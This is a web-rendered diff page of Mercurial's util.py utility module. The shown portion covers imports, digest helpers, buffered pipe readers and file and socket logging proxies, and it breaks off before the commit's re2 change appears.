##// END OF EJS Templates
re2: feed unicode string to re2 module when necessary...
marmoute -
r47598:112826b5 stable
parent child Browse files
Show More
@@ -1,3669 +1,3680 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from .node import hex
46 46 from hgdemandimport import tracing
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 base85 = policy.importmod('base85')
63 63 osutil = policy.importmod('osutil')
64 64
65 65 b85decode = base85.b85decode
66 66 b85encode = base85.b85encode
67 67
68 68 cookielib = pycompat.cookielib
69 69 httplib = pycompat.httplib
70 70 pickle = pycompat.pickle
71 71 safehasattr = pycompat.safehasattr
72 72 socketserver = pycompat.socketserver
73 73 bytesio = pycompat.bytesio
74 74 # TODO deprecate stringio name, as it is a lie on Python 3.
75 75 stringio = bytesio
76 76 xmlrpclib = pycompat.xmlrpclib
77 77
78 78 httpserver = urllibcompat.httpserver
79 79 urlerr = urllibcompat.urlerr
80 80 urlreq = urllibcompat.urlreq
81 81
82 82 # workaround for win32mbcs
83 83 _filenamebytestr = pycompat.bytestr
84 84
85 85 if pycompat.iswindows:
86 86 from . import windows as platform
87 87 else:
88 88 from . import posix as platform
89 89
90 90 _ = i18n._
91 91
92 92 bindunixsocket = platform.bindunixsocket
93 93 cachestat = platform.cachestat
94 94 checkexec = platform.checkexec
95 95 checklink = platform.checklink
96 96 copymode = platform.copymode
97 97 expandglobs = platform.expandglobs
98 98 getfsmountpoint = platform.getfsmountpoint
99 99 getfstype = platform.getfstype
100 100 groupmembers = platform.groupmembers
101 101 groupname = platform.groupname
102 102 isexec = platform.isexec
103 103 isowner = platform.isowner
104 104 listdir = osutil.listdir
105 105 localpath = platform.localpath
106 106 lookupreg = platform.lookupreg
107 107 makedir = platform.makedir
108 108 nlinks = platform.nlinks
109 109 normpath = platform.normpath
110 110 normcase = platform.normcase
111 111 normcasespec = platform.normcasespec
112 112 normcasefallback = platform.normcasefallback
113 113 openhardlinks = platform.openhardlinks
114 114 oslink = platform.oslink
115 115 parsepatchoutput = platform.parsepatchoutput
116 116 pconvert = platform.pconvert
117 117 poll = platform.poll
118 118 posixfile = platform.posixfile
119 119 readlink = platform.readlink
120 120 rename = platform.rename
121 121 removedirs = platform.removedirs
122 122 samedevice = platform.samedevice
123 123 samefile = platform.samefile
124 124 samestat = platform.samestat
125 125 setflags = platform.setflags
126 126 split = platform.split
127 127 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
128 128 statisexec = platform.statisexec
129 129 statislink = platform.statislink
130 130 umask = platform.umask
131 131 unlink = platform.unlink
132 132 username = platform.username
133 133
134 134
135 135 def setumask(val):
136 136 ''' updates the umask. used by chg server '''
137 137 if pycompat.iswindows:
138 138 return
139 139 os.umask(val)
140 140 global umask
141 141 platform.umask = umask = val & 0o777
142 142
143 143
144 144 # small compat layer
145 145 compengines = compression.compengines
146 146 SERVERROLE = compression.SERVERROLE
147 147 CLIENTROLE = compression.CLIENTROLE
148 148
149 149 try:
150 150 recvfds = osutil.recvfds
151 151 except AttributeError:
152 152 pass
153 153
154 154 # Python compatibility
155 155
156 156 _notset = object()
157 157
158 158
159 159 def bitsfrom(container):
160 160 bits = 0
161 161 for bit in container:
162 162 bits |= bit
163 163 return bits
164 164
165 165
166 166 # python 2.6 still have deprecation warning enabled by default. We do not want
167 167 # to display anything to standard user so detect if we are running test and
168 168 # only use python deprecation warning in this case.
169 169 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
170 170 if _dowarn:
171 171 # explicitly unfilter our warning for python 2.7
172 172 #
173 173 # The option of setting PYTHONWARNINGS in the test runner was investigated.
174 174 # However, module name set through PYTHONWARNINGS was exactly matched, so
175 175 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
176 176 # makes the whole PYTHONWARNINGS thing useless for our usecase.
177 177 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
178 178 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
179 179 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
180 180 if _dowarn and pycompat.ispy3:
181 181 # silence warning emitted by passing user string to re.sub()
182 182 warnings.filterwarnings(
183 183 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
184 184 )
185 185 warnings.filterwarnings(
186 186 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
187 187 )
188 188 # TODO: reinvent imp.is_frozen()
189 189 warnings.filterwarnings(
190 190 'ignore',
191 191 'the imp module is deprecated',
192 192 DeprecationWarning,
193 193 'mercurial',
194 194 )
195 195
196 196
197 197 def nouideprecwarn(msg, version, stacklevel=1):
198 198 """Issue an python native deprecation warning
199 199
200 200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
201 201 """
202 202 if _dowarn:
203 203 msg += (
204 204 b"\n(compatibility will be dropped after Mercurial-%s,"
205 205 b" update your code.)"
206 206 ) % version
207 207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
208 208 # on python 3 with chg, we will need to explicitly flush the output
209 209 sys.stderr.flush()
210 210
211 211
212 212 DIGESTS = {
213 213 b'md5': hashlib.md5,
214 214 b'sha1': hashutil.sha1,
215 215 b'sha512': hashlib.sha512,
216 216 }
217 217 # List of digest types from strongest to weakest
218 218 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
219 219
220 220 for k in DIGESTS_BY_STRENGTH:
221 221 assert k in DIGESTS
222 222
223 223
224 224 class digester(object):
225 225 """helper to compute digests.
226 226
227 227 This helper can be used to compute one or more digests given their name.
228 228
229 229 >>> d = digester([b'md5', b'sha1'])
230 230 >>> d.update(b'foo')
231 231 >>> [k for k in sorted(d)]
232 232 ['md5', 'sha1']
233 233 >>> d[b'md5']
234 234 'acbd18db4cc2f85cedef654fccc4a4d8'
235 235 >>> d[b'sha1']
236 236 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
237 237 >>> digester.preferred([b'md5', b'sha1'])
238 238 'sha1'
239 239 """
240 240
241 241 def __init__(self, digests, s=b''):
242 242 self._hashes = {}
243 243 for k in digests:
244 244 if k not in DIGESTS:
245 245 raise error.Abort(_(b'unknown digest type: %s') % k)
246 246 self._hashes[k] = DIGESTS[k]()
247 247 if s:
248 248 self.update(s)
249 249
250 250 def update(self, data):
251 251 for h in self._hashes.values():
252 252 h.update(data)
253 253
254 254 def __getitem__(self, key):
255 255 if key not in DIGESTS:
256 256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 257 return hex(self._hashes[key].digest())
258 258
259 259 def __iter__(self):
260 260 return iter(self._hashes)
261 261
262 262 @staticmethod
263 263 def preferred(supported):
264 264 """returns the strongest digest type in both supported and DIGESTS."""
265 265
266 266 for k in DIGESTS_BY_STRENGTH:
267 267 if k in supported:
268 268 return k
269 269 return None
270 270
271 271
272 272 class digestchecker(object):
273 273 """file handle wrapper that additionally checks content against a given
274 274 size and digests.
275 275
276 276 d = digestchecker(fh, size, {'md5': '...'})
277 277
278 278 When multiple digests are given, all of them are validated.
279 279 """
280 280
281 281 def __init__(self, fh, size, digests):
282 282 self._fh = fh
283 283 self._size = size
284 284 self._got = 0
285 285 self._digests = dict(digests)
286 286 self._digester = digester(self._digests.keys())
287 287
288 288 def read(self, length=-1):
289 289 content = self._fh.read(length)
290 290 self._digester.update(content)
291 291 self._got += len(content)
292 292 return content
293 293
294 294 def validate(self):
295 295 if self._size != self._got:
296 296 raise error.Abort(
297 297 _(b'size mismatch: expected %d, got %d')
298 298 % (self._size, self._got)
299 299 )
300 300 for k, v in self._digests.items():
301 301 if v != self._digester[k]:
302 302 # i18n: first parameter is a digest name
303 303 raise error.Abort(
304 304 _(b'%s mismatch: expected %s, got %s')
305 305 % (k, v, self._digester[k])
306 306 )
307 307
308 308
309 309 try:
310 310 buffer = buffer
311 311 except NameError:
312 312
313 313 def buffer(sliceable, offset=0, length=None):
314 314 if length is not None:
315 315 return memoryview(sliceable)[offset : offset + length]
316 316 return memoryview(sliceable)[offset:]
317 317
318 318
319 319 _chunksize = 4096
320 320
321 321
322 322 class bufferedinputpipe(object):
323 323 """a manually buffered input pipe
324 324
325 325 Python will not let us use buffered IO and lazy reading with 'polling' at
326 326 the same time. We cannot probe the buffer state and select will not detect
327 327 that data are ready to read if they are already buffered.
328 328
329 329 This class let us work around that by implementing its own buffering
330 330 (allowing efficient readline) while offering a way to know if the buffer is
331 331 empty from the output (allowing collaboration of the buffer with polling).
332 332
333 333 This class lives in the 'util' module because it makes use of the 'os'
334 334 module from the python stdlib.
335 335 """
336 336
337 337 def __new__(cls, fh):
338 338 # If we receive a fileobjectproxy, we need to use a variation of this
339 339 # class that notifies observers about activity.
340 340 if isinstance(fh, fileobjectproxy):
341 341 cls = observedbufferedinputpipe
342 342
343 343 return super(bufferedinputpipe, cls).__new__(cls)
344 344
345 345 def __init__(self, input):
346 346 self._input = input
347 347 self._buffer = []
348 348 self._eof = False
349 349 self._lenbuf = 0
350 350
351 351 @property
352 352 def hasbuffer(self):
353 353 """True is any data is currently buffered
354 354
355 355 This will be used externally a pre-step for polling IO. If there is
356 356 already data then no polling should be set in place."""
357 357 return bool(self._buffer)
358 358
359 359 @property
360 360 def closed(self):
361 361 return self._input.closed
362 362
363 363 def fileno(self):
364 364 return self._input.fileno()
365 365
366 366 def close(self):
367 367 return self._input.close()
368 368
369 369 def read(self, size):
370 370 while (not self._eof) and (self._lenbuf < size):
371 371 self._fillbuffer()
372 372 return self._frombuffer(size)
373 373
374 374 def unbufferedread(self, size):
375 375 if not self._eof and self._lenbuf == 0:
376 376 self._fillbuffer(max(size, _chunksize))
377 377 return self._frombuffer(min(self._lenbuf, size))
378 378
379 379 def readline(self, *args, **kwargs):
380 380 if len(self._buffer) > 1:
381 381 # this should not happen because both read and readline end with a
382 382 # _frombuffer call that collapse it.
383 383 self._buffer = [b''.join(self._buffer)]
384 384 self._lenbuf = len(self._buffer[0])
385 385 lfi = -1
386 386 if self._buffer:
387 387 lfi = self._buffer[-1].find(b'\n')
388 388 while (not self._eof) and lfi < 0:
389 389 self._fillbuffer()
390 390 if self._buffer:
391 391 lfi = self._buffer[-1].find(b'\n')
392 392 size = lfi + 1
393 393 if lfi < 0: # end of file
394 394 size = self._lenbuf
395 395 elif len(self._buffer) > 1:
396 396 # we need to take previous chunks into account
397 397 size += self._lenbuf - len(self._buffer[-1])
398 398 return self._frombuffer(size)
399 399
400 400 def _frombuffer(self, size):
401 401 """return at most 'size' data from the buffer
402 402
403 403 The data are removed from the buffer."""
404 404 if size == 0 or not self._buffer:
405 405 return b''
406 406 buf = self._buffer[0]
407 407 if len(self._buffer) > 1:
408 408 buf = b''.join(self._buffer)
409 409
410 410 data = buf[:size]
411 411 buf = buf[len(data) :]
412 412 if buf:
413 413 self._buffer = [buf]
414 414 self._lenbuf = len(buf)
415 415 else:
416 416 self._buffer = []
417 417 self._lenbuf = 0
418 418 return data
419 419
420 420 def _fillbuffer(self, size=_chunksize):
421 421 """read data to the buffer"""
422 422 data = os.read(self._input.fileno(), size)
423 423 if not data:
424 424 self._eof = True
425 425 else:
426 426 self._lenbuf += len(data)
427 427 self._buffer.append(data)
428 428
429 429 return data
430 430
431 431
432 432 def mmapread(fp, size=None):
433 433 if size == 0:
434 434 # size of 0 to mmap.mmap() means "all data"
435 435 # rather than "zero bytes", so special case that.
436 436 return b''
437 437 elif size is None:
438 438 size = 0
439 439 try:
440 440 fd = getattr(fp, 'fileno', lambda: fp)()
441 441 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
442 442 except ValueError:
443 443 # Empty files cannot be mmapped, but mmapread should still work. Check
444 444 # if the file is empty, and if so, return an empty buffer.
445 445 if os.fstat(fd).st_size == 0:
446 446 return b''
447 447 raise
448 448
449 449
450 450 class fileobjectproxy(object):
451 451 """A proxy around file objects that tells a watcher when events occur.
452 452
453 453 This type is intended to only be used for testing purposes. Think hard
454 454 before using it in important code.
455 455 """
456 456
457 457 __slots__ = (
458 458 '_orig',
459 459 '_observer',
460 460 )
461 461
462 462 def __init__(self, fh, observer):
463 463 object.__setattr__(self, '_orig', fh)
464 464 object.__setattr__(self, '_observer', observer)
465 465
466 466 def __getattribute__(self, name):
467 467 ours = {
468 468 '_observer',
469 469 # IOBase
470 470 'close',
471 471 # closed if a property
472 472 'fileno',
473 473 'flush',
474 474 'isatty',
475 475 'readable',
476 476 'readline',
477 477 'readlines',
478 478 'seek',
479 479 'seekable',
480 480 'tell',
481 481 'truncate',
482 482 'writable',
483 483 'writelines',
484 484 # RawIOBase
485 485 'read',
486 486 'readall',
487 487 'readinto',
488 488 'write',
489 489 # BufferedIOBase
490 490 # raw is a property
491 491 'detach',
492 492 # read defined above
493 493 'read1',
494 494 # readinto defined above
495 495 # write defined above
496 496 }
497 497
498 498 # We only observe some methods.
499 499 if name in ours:
500 500 return object.__getattribute__(self, name)
501 501
502 502 return getattr(object.__getattribute__(self, '_orig'), name)
503 503
504 504 def __nonzero__(self):
505 505 return bool(object.__getattribute__(self, '_orig'))
506 506
507 507 __bool__ = __nonzero__
508 508
509 509 def __delattr__(self, name):
510 510 return delattr(object.__getattribute__(self, '_orig'), name)
511 511
512 512 def __setattr__(self, name, value):
513 513 return setattr(object.__getattribute__(self, '_orig'), name, value)
514 514
515 515 def __iter__(self):
516 516 return object.__getattribute__(self, '_orig').__iter__()
517 517
518 518 def _observedcall(self, name, *args, **kwargs):
519 519 # Call the original object.
520 520 orig = object.__getattribute__(self, '_orig')
521 521 res = getattr(orig, name)(*args, **kwargs)
522 522
523 523 # Call a method on the observer of the same name with arguments
524 524 # so it can react, log, etc.
525 525 observer = object.__getattribute__(self, '_observer')
526 526 fn = getattr(observer, name, None)
527 527 if fn:
528 528 fn(res, *args, **kwargs)
529 529
530 530 return res
531 531
532 532 def close(self, *args, **kwargs):
533 533 return object.__getattribute__(self, '_observedcall')(
534 534 'close', *args, **kwargs
535 535 )
536 536
537 537 def fileno(self, *args, **kwargs):
538 538 return object.__getattribute__(self, '_observedcall')(
539 539 'fileno', *args, **kwargs
540 540 )
541 541
542 542 def flush(self, *args, **kwargs):
543 543 return object.__getattribute__(self, '_observedcall')(
544 544 'flush', *args, **kwargs
545 545 )
546 546
547 547 def isatty(self, *args, **kwargs):
548 548 return object.__getattribute__(self, '_observedcall')(
549 549 'isatty', *args, **kwargs
550 550 )
551 551
552 552 def readable(self, *args, **kwargs):
553 553 return object.__getattribute__(self, '_observedcall')(
554 554 'readable', *args, **kwargs
555 555 )
556 556
557 557 def readline(self, *args, **kwargs):
558 558 return object.__getattribute__(self, '_observedcall')(
559 559 'readline', *args, **kwargs
560 560 )
561 561
562 562 def readlines(self, *args, **kwargs):
563 563 return object.__getattribute__(self, '_observedcall')(
564 564 'readlines', *args, **kwargs
565 565 )
566 566
567 567 def seek(self, *args, **kwargs):
568 568 return object.__getattribute__(self, '_observedcall')(
569 569 'seek', *args, **kwargs
570 570 )
571 571
572 572 def seekable(self, *args, **kwargs):
573 573 return object.__getattribute__(self, '_observedcall')(
574 574 'seekable', *args, **kwargs
575 575 )
576 576
577 577 def tell(self, *args, **kwargs):
578 578 return object.__getattribute__(self, '_observedcall')(
579 579 'tell', *args, **kwargs
580 580 )
581 581
582 582 def truncate(self, *args, **kwargs):
583 583 return object.__getattribute__(self, '_observedcall')(
584 584 'truncate', *args, **kwargs
585 585 )
586 586
587 587 def writable(self, *args, **kwargs):
588 588 return object.__getattribute__(self, '_observedcall')(
589 589 'writable', *args, **kwargs
590 590 )
591 591
592 592 def writelines(self, *args, **kwargs):
593 593 return object.__getattribute__(self, '_observedcall')(
594 594 'writelines', *args, **kwargs
595 595 )
596 596
597 597 def read(self, *args, **kwargs):
598 598 return object.__getattribute__(self, '_observedcall')(
599 599 'read', *args, **kwargs
600 600 )
601 601
602 602 def readall(self, *args, **kwargs):
603 603 return object.__getattribute__(self, '_observedcall')(
604 604 'readall', *args, **kwargs
605 605 )
606 606
607 607 def readinto(self, *args, **kwargs):
608 608 return object.__getattribute__(self, '_observedcall')(
609 609 'readinto', *args, **kwargs
610 610 )
611 611
612 612 def write(self, *args, **kwargs):
613 613 return object.__getattribute__(self, '_observedcall')(
614 614 'write', *args, **kwargs
615 615 )
616 616
617 617 def detach(self, *args, **kwargs):
618 618 return object.__getattribute__(self, '_observedcall')(
619 619 'detach', *args, **kwargs
620 620 )
621 621
622 622 def read1(self, *args, **kwargs):
623 623 return object.__getattribute__(self, '_observedcall')(
624 624 'read1', *args, **kwargs
625 625 )
626 626
627 627
628 628 class observedbufferedinputpipe(bufferedinputpipe):
629 629 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
630 630
631 631 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
632 632 bypass ``fileobjectproxy``. Because of this, we need to make
633 633 ``bufferedinputpipe`` aware of these operations.
634 634
635 635 This variation of ``bufferedinputpipe`` can notify observers about
636 636 ``os.read()`` events. It also re-publishes other events, such as
637 637 ``read()`` and ``readline()``.
638 638 """
639 639
640 640 def _fillbuffer(self):
641 641 res = super(observedbufferedinputpipe, self)._fillbuffer()
642 642
643 643 fn = getattr(self._input._observer, 'osread', None)
644 644 if fn:
645 645 fn(res, _chunksize)
646 646
647 647 return res
648 648
649 649 # We use different observer methods because the operation isn't
650 650 # performed on the actual file object but on us.
651 651 def read(self, size):
652 652 res = super(observedbufferedinputpipe, self).read(size)
653 653
654 654 fn = getattr(self._input._observer, 'bufferedread', None)
655 655 if fn:
656 656 fn(res, size)
657 657
658 658 return res
659 659
660 660 def readline(self, *args, **kwargs):
661 661 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
662 662
663 663 fn = getattr(self._input._observer, 'bufferedreadline', None)
664 664 if fn:
665 665 fn(res)
666 666
667 667 return res
668 668
669 669
670 670 PROXIED_SOCKET_METHODS = {
671 671 'makefile',
672 672 'recv',
673 673 'recvfrom',
674 674 'recvfrom_into',
675 675 'recv_into',
676 676 'send',
677 677 'sendall',
678 678 'sendto',
679 679 'setblocking',
680 680 'settimeout',
681 681 'gettimeout',
682 682 'setsockopt',
683 683 }
684 684
685 685
686 686 class socketproxy(object):
687 687 """A proxy around a socket that tells a watcher when events occur.
688 688
689 689 This is like ``fileobjectproxy`` except for sockets.
690 690
691 691 This type is intended to only be used for testing purposes. Think hard
692 692 before using it in important code.
693 693 """
694 694
695 695 __slots__ = (
696 696 '_orig',
697 697 '_observer',
698 698 )
699 699
700 700 def __init__(self, sock, observer):
701 701 object.__setattr__(self, '_orig', sock)
702 702 object.__setattr__(self, '_observer', observer)
703 703
704 704 def __getattribute__(self, name):
705 705 if name in PROXIED_SOCKET_METHODS:
706 706 return object.__getattribute__(self, name)
707 707
708 708 return getattr(object.__getattribute__(self, '_orig'), name)
709 709
710 710 def __delattr__(self, name):
711 711 return delattr(object.__getattribute__(self, '_orig'), name)
712 712
713 713 def __setattr__(self, name, value):
714 714 return setattr(object.__getattribute__(self, '_orig'), name, value)
715 715
716 716 def __nonzero__(self):
717 717 return bool(object.__getattribute__(self, '_orig'))
718 718
719 719 __bool__ = __nonzero__
720 720
721 721 def _observedcall(self, name, *args, **kwargs):
722 722 # Call the original object.
723 723 orig = object.__getattribute__(self, '_orig')
724 724 res = getattr(orig, name)(*args, **kwargs)
725 725
726 726 # Call a method on the observer of the same name with arguments
727 727 # so it can react, log, etc.
728 728 observer = object.__getattribute__(self, '_observer')
729 729 fn = getattr(observer, name, None)
730 730 if fn:
731 731 fn(res, *args, **kwargs)
732 732
733 733 return res
734 734
735 735 def makefile(self, *args, **kwargs):
736 736 res = object.__getattribute__(self, '_observedcall')(
737 737 'makefile', *args, **kwargs
738 738 )
739 739
740 740 # The file object may be used for I/O. So we turn it into a
741 741 # proxy using our observer.
742 742 observer = object.__getattribute__(self, '_observer')
743 743 return makeloggingfileobject(
744 744 observer.fh,
745 745 res,
746 746 observer.name,
747 747 reads=observer.reads,
748 748 writes=observer.writes,
749 749 logdata=observer.logdata,
750 750 logdataapis=observer.logdataapis,
751 751 )
752 752
753 753 def recv(self, *args, **kwargs):
754 754 return object.__getattribute__(self, '_observedcall')(
755 755 'recv', *args, **kwargs
756 756 )
757 757
758 758 def recvfrom(self, *args, **kwargs):
759 759 return object.__getattribute__(self, '_observedcall')(
760 760 'recvfrom', *args, **kwargs
761 761 )
762 762
763 763 def recvfrom_into(self, *args, **kwargs):
764 764 return object.__getattribute__(self, '_observedcall')(
765 765 'recvfrom_into', *args, **kwargs
766 766 )
767 767
768 768 def recv_into(self, *args, **kwargs):
769 769 return object.__getattribute__(self, '_observedcall')(
770 770 'recv_info', *args, **kwargs
771 771 )
772 772
773 773 def send(self, *args, **kwargs):
774 774 return object.__getattribute__(self, '_observedcall')(
775 775 'send', *args, **kwargs
776 776 )
777 777
778 778 def sendall(self, *args, **kwargs):
779 779 return object.__getattribute__(self, '_observedcall')(
780 780 'sendall', *args, **kwargs
781 781 )
782 782
783 783 def sendto(self, *args, **kwargs):
784 784 return object.__getattribute__(self, '_observedcall')(
785 785 'sendto', *args, **kwargs
786 786 )
787 787
788 788 def setblocking(self, *args, **kwargs):
789 789 return object.__getattribute__(self, '_observedcall')(
790 790 'setblocking', *args, **kwargs
791 791 )
792 792
793 793 def settimeout(self, *args, **kwargs):
794 794 return object.__getattribute__(self, '_observedcall')(
795 795 'settimeout', *args, **kwargs
796 796 )
797 797
798 798 def gettimeout(self, *args, **kwargs):
799 799 return object.__getattribute__(self, '_observedcall')(
800 800 'gettimeout', *args, **kwargs
801 801 )
802 802
803 803 def setsockopt(self, *args, **kwargs):
804 804 return object.__getattribute__(self, '_observedcall')(
805 805 'setsockopt', *args, **kwargs
806 806 )
807 807
808 808
809 809 class baseproxyobserver(object):
810 810 def __init__(self, fh, name, logdata, logdataapis):
811 811 self.fh = fh
812 812 self.name = name
813 813 self.logdata = logdata
814 814 self.logdataapis = logdataapis
815 815
816 816 def _writedata(self, data):
817 817 if not self.logdata:
818 818 if self.logdataapis:
819 819 self.fh.write(b'\n')
820 820 self.fh.flush()
821 821 return
822 822
823 823 # Simple case writes all data on a single line.
824 824 if b'\n' not in data:
825 825 if self.logdataapis:
826 826 self.fh.write(b': %s\n' % stringutil.escapestr(data))
827 827 else:
828 828 self.fh.write(
829 829 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
830 830 )
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Data with newlines is written to multiple lines.
835 835 if self.logdataapis:
836 836 self.fh.write(b':\n')
837 837
838 838 lines = data.splitlines(True)
839 839 for line in lines:
840 840 self.fh.write(
841 841 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
842 842 )
843 843 self.fh.flush()
844 844
845 845
846 846 class fileobjectobserver(baseproxyobserver):
847 847 """Logs file object activity."""
848 848
849 849 def __init__(
850 850 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
851 851 ):
852 852 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
853 853 self.reads = reads
854 854 self.writes = writes
855 855
856 856 def read(self, res, size=-1):
857 857 if not self.reads:
858 858 return
859 859 # Python 3 can return None from reads at EOF instead of empty strings.
860 860 if res is None:
861 861 res = b''
862 862
863 863 if size == -1 and res == b'':
864 864 # Suppress pointless read(-1) calls that return
865 865 # nothing. These happen _a lot_ on Python 3, and there
866 866 # doesn't seem to be a better workaround to have matching
867 867 # Python 2 and 3 behavior. :(
868 868 return
869 869
870 870 if self.logdataapis:
871 871 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
872 872
873 873 self._writedata(res)
874 874
875 875 def readline(self, res, limit=-1):
876 876 if not self.reads:
877 877 return
878 878
879 879 if self.logdataapis:
880 880 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
881 881
882 882 self._writedata(res)
883 883
884 884 def readinto(self, res, dest):
885 885 if not self.reads:
886 886 return
887 887
888 888 if self.logdataapis:
889 889 self.fh.write(
890 890 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
891 891 )
892 892
893 893 data = dest[0:res] if res is not None else b''
894 894
895 895 # _writedata() uses "in" operator and is confused by memoryview because
896 896 # characters are ints on Python 3.
897 897 if isinstance(data, memoryview):
898 898 data = data.tobytes()
899 899
900 900 self._writedata(data)
901 901
902 902 def write(self, res, data):
903 903 if not self.writes:
904 904 return
905 905
906 906 # Python 2 returns None from some write() calls. Python 3 (reasonably)
907 907 # returns the integer bytes written.
908 908 if res is None and data:
909 909 res = len(data)
910 910
911 911 if self.logdataapis:
912 912 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
913 913
914 914 self._writedata(data)
915 915
916 916 def flush(self, res):
917 917 if not self.writes:
918 918 return
919 919
920 920 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
921 921
922 922 # For observedbufferedinputpipe.
923 923 def bufferedread(self, res, size):
924 924 if not self.reads:
925 925 return
926 926
927 927 if self.logdataapis:
928 928 self.fh.write(
929 929 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
930 930 )
931 931
932 932 self._writedata(res)
933 933
934 934 def bufferedreadline(self, res):
935 935 if not self.reads:
936 936 return
937 937
938 938 if self.logdataapis:
939 939 self.fh.write(
940 940 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
941 941 )
942 942
943 943 self._writedata(res)
944 944
945 945
946 946 def makeloggingfileobject(
947 947 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
948 948 ):
949 949 """Turn a file object into a logging file object."""
950 950
951 951 observer = fileobjectobserver(
952 952 logh,
953 953 name,
954 954 reads=reads,
955 955 writes=writes,
956 956 logdata=logdata,
957 957 logdataapis=logdataapis,
958 958 )
959 959 return fileobjectproxy(fh, observer)
960 960
961 961
962 962 class socketobserver(baseproxyobserver):
963 963 """Logs socket activity."""
964 964
965 965 def __init__(
966 966 self,
967 967 fh,
968 968 name,
969 969 reads=True,
970 970 writes=True,
971 971 states=True,
972 972 logdata=False,
973 973 logdataapis=True,
974 974 ):
975 975 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
976 976 self.reads = reads
977 977 self.writes = writes
978 978 self.states = states
979 979
980 980 def makefile(self, res, mode=None, bufsize=None):
981 981 if not self.states:
982 982 return
983 983
984 984 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
985 985
986 986 def recv(self, res, size, flags=0):
987 987 if not self.reads:
988 988 return
989 989
990 990 if self.logdataapis:
991 991 self.fh.write(
992 992 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
993 993 )
994 994 self._writedata(res)
995 995
996 996 def recvfrom(self, res, size, flags=0):
997 997 if not self.reads:
998 998 return
999 999
1000 1000 if self.logdataapis:
1001 1001 self.fh.write(
1002 1002 b'%s> recvfrom(%d, %d) -> %d'
1003 1003 % (self.name, size, flags, len(res[0]))
1004 1004 )
1005 1005
1006 1006 self._writedata(res[0])
1007 1007
1008 1008 def recvfrom_into(self, res, buf, size, flags=0):
1009 1009 if not self.reads:
1010 1010 return
1011 1011
1012 1012 if self.logdataapis:
1013 1013 self.fh.write(
1014 1014 b'%s> recvfrom_into(%d, %d) -> %d'
1015 1015 % (self.name, size, flags, res[0])
1016 1016 )
1017 1017
1018 1018 self._writedata(buf[0 : res[0]])
1019 1019
1020 1020 def recv_into(self, res, buf, size=0, flags=0):
1021 1021 if not self.reads:
1022 1022 return
1023 1023
1024 1024 if self.logdataapis:
1025 1025 self.fh.write(
1026 1026 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1027 1027 )
1028 1028
1029 1029 self._writedata(buf[0:res])
1030 1030
1031 1031 def send(self, res, data, flags=0):
1032 1032 if not self.writes:
1033 1033 return
1034 1034
1035 1035 self.fh.write(
1036 1036 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1037 1037 )
1038 1038 self._writedata(data)
1039 1039
1040 1040 def sendall(self, res, data, flags=0):
1041 1041 if not self.writes:
1042 1042 return
1043 1043
1044 1044 if self.logdataapis:
1045 1045 # Returns None on success. So don't bother reporting return value.
1046 1046 self.fh.write(
1047 1047 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1048 1048 )
1049 1049
1050 1050 self._writedata(data)
1051 1051
1052 1052 def sendto(self, res, data, flagsoraddress, address=None):
1053 1053 if not self.writes:
1054 1054 return
1055 1055
1056 1056 if address:
1057 1057 flags = flagsoraddress
1058 1058 else:
1059 1059 flags = 0
1060 1060
1061 1061 if self.logdataapis:
1062 1062 self.fh.write(
1063 1063 b'%s> sendto(%d, %d, %r) -> %d'
